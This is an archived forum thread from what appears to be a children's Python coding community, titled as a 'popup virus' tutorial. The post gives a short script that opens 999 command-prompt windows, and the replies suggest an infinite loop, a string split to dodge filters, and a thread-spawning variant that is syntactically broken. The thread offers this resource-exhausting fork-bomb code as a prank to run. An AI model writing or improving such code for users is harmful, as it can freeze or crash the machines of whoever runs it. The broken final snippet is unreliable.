猫史档案馆


【Python作品分享】弹窗病毒【教程贴】

用户:魚志哲魚志哲查看:2 回复:3 评论:2 创建时间:2020-04-16T20:19:38


【作品展示】

center_image

 

【作品介绍】

此程序可能导致计算机过热,请在有计算机经验人士陪同喵验。如有任何意外务必强制处理

 

【作品源代码】

import os

for i in range(999):
    os.system("start cmd")

 

【提示】

部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:

https://python.codemao.cn


回复

上一页1 页 / 共 1下一页
liuzhiyuliuzhiyu

import os

for i in range(999):
    os.system("start cm"+"d")

点赞0


评论


RmolusRmolus

这是重复999次,你应该while True(滑稽)

点赞0


评论


LAG的1048576一枚LAG的1048576一枚

from os import system
from threading import Thread
def run():
    while True:
        try:
            system('')
while 1:
    Thread(target=run).start()

点赞0


评论